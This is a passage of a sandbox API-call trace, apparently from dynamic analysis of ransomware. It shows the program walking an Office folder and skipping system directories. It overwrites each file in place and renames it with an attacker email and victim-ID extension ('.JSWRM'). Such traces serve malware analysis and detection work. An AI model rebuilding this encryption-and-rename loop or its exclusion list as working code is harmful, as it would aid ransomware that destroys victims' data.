lpWideCharStr="CHECKER.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHECKER.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHECKER.POC", lpUsedDefaultChar=0x0) returned 11 [0140.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0140.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0140.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHECKER.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHECKER.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHECKER.POC", lpUsedDefaultChar=0x0) returned 11 [0140.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0140.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0140.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0140.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0140.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CHECKER.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\checker.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.865] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5902) returned 1 [0140.865] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1700) returned 0x27b348 [0140.865] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1700, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1700, lpOverlapped=0x0) returned 1 [0140.867] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.867] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1700, lpOverlapped=0x0) returned 1 [0140.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.867] CloseHandle (hObject=0x238) returned 1 [0140.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0140.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0140.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0140.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0140.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0140.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.867] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CHECKER.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\checker.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CHECKER.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\checker.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0140.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0140.868] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218d63bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218d63bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21994fc3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2808, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CONTACTINFOBB.DPV", cAlternateFileName="CONTAC~1.DPV")) returned 1 [0140.868] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2=".") returned 1 [0140.868] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2="..") returned 1 [0140.869] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2="...") returned 1 [0140.869] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2="windows") returned -1 [0140.869] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2="recovery") returned -1 [0140.869] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2="perflogs") returned -1 [0140.869] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2="documents and settings") returned -1 [0140.869] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.869] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2="system volume information") returned -1 [0140.869] lstrcmpiW (lpString1="CONTACTINFOBB.DPV", lpString2="msocache") returned -1 [0140.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTINFOBB.DPV", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0140.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0140.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTINFOBB.DPV", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACTINFOBB.DPV", lpUsedDefaultChar=0x0) returned 17 [0140.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0140.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTINFOBB.DPV", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0140.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0140.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTINFOBB.DPV", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACTINFOBB.DPV", lpUsedDefaultChar=0x0) returned 17 [0140.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0140.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0140.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0140.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0140.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CONTACTINFOBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\contactinfobb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.870] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10248) returned 1 [0140.870] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2800) returned 0x27b348 [0140.870] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2800, lpOverlapped=0x0) returned 1 [0140.872] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.872] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2800, lpOverlapped=0x0) returned 1 [0140.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.872] CloseHandle (hObject=0x238) returned 1 [0140.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0140.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0140.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0140.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0140.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0140.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0140.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0140.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0140.873] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CONTACTINFOBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\contactinfobb.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CONTACTINFOBB.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\contactinfobb.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0140.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0140.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0140.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0140.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0140.874] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21bab08a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21bab08a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ce8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CONTACTINFOBB.POC", cAlternateFileName="CONTAC~1.POC")) returned 1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2=".") returned 1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2="..") returned 1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2="...") returned 1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2="windows") returned -1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2="recovery") returned -1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2="perflogs") returned -1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2="documents and settings") returned -1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2="system volume information") returned -1 [0140.874] lstrcmpiW (lpString1="CONTACTINFOBB.POC", lpString2="msocache") returned -1 [0140.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0140.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTINFOBB.POC", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0140.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0140.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTINFOBB.POC", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACTINFOBB.POC", lpUsedDefaultChar=0x0) returned 17 [0140.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0140.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0140.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTINFOBB.POC", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0140.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0140.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTINFOBB.POC", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACTINFOBB.POC", lpUsedDefaultChar=0x0) returned 17 [0140.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0140.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0140.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0140.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0140.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CONTACTINFOBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\contactinfobb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.878] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19688) returned 1 [0140.878] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ce0) returned 0x27b348 [0140.878] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x4ce0, lpOverlapped=0x0) returned 1 [0140.881] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.881] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x4ce0, lpOverlapped=0x0) returned 1 [0140.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.881] CloseHandle (hObject=0x238) returned 1 [0140.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0140.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0140.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0140.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0140.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0140.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0140.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0140.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0140.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.881] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CONTACTINFOBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\contactinfobb.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CONTACTINFOBB.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\contactinfobb.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0140.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0140.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0140.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0140.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0140.882] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21bab08a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21bab08a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc692, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="COUPON.POC", cAlternateFileName="")) returned 1 [0140.882] lstrcmpiW (lpString1="COUPON.POC", lpString2=".") returned 1 [0140.882] lstrcmpiW (lpString1="COUPON.POC", lpString2="..") returned 1 [0140.883] lstrcmpiW (lpString1="COUPON.POC", lpString2="...") returned 1 [0140.883] lstrcmpiW (lpString1="COUPON.POC", lpString2="windows") returned -1 [0140.883] lstrcmpiW (lpString1="COUPON.POC", lpString2="recovery") returned -1 [0140.883] lstrcmpiW (lpString1="COUPON.POC", lpString2="perflogs") returned -1 [0140.883] lstrcmpiW (lpString1="COUPON.POC", lpString2="documents and settings") returned -1 [0140.883] lstrcmpiW (lpString1="COUPON.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.883] lstrcmpiW (lpString1="COUPON.POC", lpString2="system volume information") returned -1 [0140.883] lstrcmpiW (lpString1="COUPON.POC", lpString2="msocache") returned -1 [0140.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0140.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUPON.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUPON.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COUPON.POC", lpUsedDefaultChar=0x0) returned 10 [0140.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0140.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0140.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUPON.POC", cchWideChar=10, 